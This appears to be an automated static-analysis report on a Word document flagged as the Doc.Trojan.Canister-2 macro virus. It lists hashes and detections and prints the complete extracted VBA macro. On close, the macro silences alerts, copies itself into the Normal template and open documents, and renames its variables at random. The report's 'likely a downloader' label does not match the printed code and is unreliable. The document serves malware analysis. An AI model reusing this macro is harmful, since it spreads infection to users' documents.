Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 06de0386d5ba35dd…

MALICIOUS

Office (OLE)

Size: 29.0 KB
Created: 2003-08-16 15:45:00
Authoring application: Microsoft Word 10.0
First seen: 2012-06-14
MD5: 1c1d84ee03a1ff6f892e3fbf6ce8041e
SHA-1: ccd2a46ce0d124f8442ed3bb0ce50568dd1df4c2
SHA-256: 06de0386d5ba35dd0e3a31dec758ee441c187c2d12dfe9de93cd30981c1bf671
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Canister-2. Static analysis revealed the presence of VBA macros within the document. The macro code appears to be obfuscated, making it difficult to determine its exact functionality, but it is designed to manipulate the document's VBA project and potentially execute further actions. The primary function seems to be related to the obfuscation and execution of malicious code, likely a downloader.

Heuristics (2)

  • ClamAV: Doc.Trojan.Canister-2 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Canister-2
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1918 bytes
SHA-256: 8f25f7c25369cdd1bcf6ca94ab901d274d71d625dd9056d5f1791e3ae67a3b3d

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Sub Document_close() 'WMXP.CaniSter.B by Kernel32
IFUPD01: Randomize Timer: XQVMO = (False * False): GQVQQ = (True / True): GoTo IFUPD02
IFUPD02: Set SXCQI = VBE.ActiveCodePane.CodeModule: GoTo IFUPD03
IFUPD03: SVJKH = SXCQI.lines(GQVQQ, SXCQI.countoflines): GoSub IFUPD12: GoTo IFUPD04
IFUPD04: With Application: .DisplayStatusBar = XQVMO: .DisplayAlerts = wdAlertsNone: End With: GoTo IFUPD05
IFUPD05: With Application: .EnableCancelKey = wdCancelDisabled: .Options.ConfirmConversions = XQVMO: End With: GoTo IFUPD06
IFUPD06: With Options: .Application.ScreenUpdating = XQVMO: .SaveNormalPrompt = XQVMO: End With: GoTo IFUPD07:
IFUPD07: Set MELCQ = Normal.ThisDocument.VBProject.vbcomponents(GQVQQ).CodeModule: GoTo IFUPD08
IFUPD08: MELCQ.deletelines GQVQQ, MELCQ.countoflines: GoTo IFUPD09
IFUPD09: MELCQ.addfromstring SVJKH: GoTo IFUPD10
IFUPD10: Set PNKFC = ActiveDocument.VBProject.vbcomponents(GQVQQ).CodeModule: GoTo IFUPD11
IFUPD11: PNKFC.deletelines GQVQQ, PNKFC.countoflines: PNKFC.addfromstring SVJKH: GoTo IFUPD18
IFUPD12: Dim HHJHS(20) As String: GoTo IFUPD13
IFUPD13: HHJHS(1) = "SXCQI": HHJHS(2) = "XQVMO": HHJHS(3) = "GQVQQ": GoTo IFUPD14
IFUPD14: HHJHS(4) = "SVJKH": HHJHS(5) = "MELCQ": HHJHS(6) = "PNKFC": GoTo IFUPD15
IFUPD15: HHJHS(7) = "HHJHS": HHJHS(8) = "IFUPD": HHJHS(9) = "AATRU": GoTo IFUPD16
IFUPD16: AATRU = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65): GoTo IFUPD17
IFUPD17: SVJKH = Replace(SVJKH, HHJHS(Int(Rnd * 9) + 1), AATRU): Return
IFUPD18: End
End Sub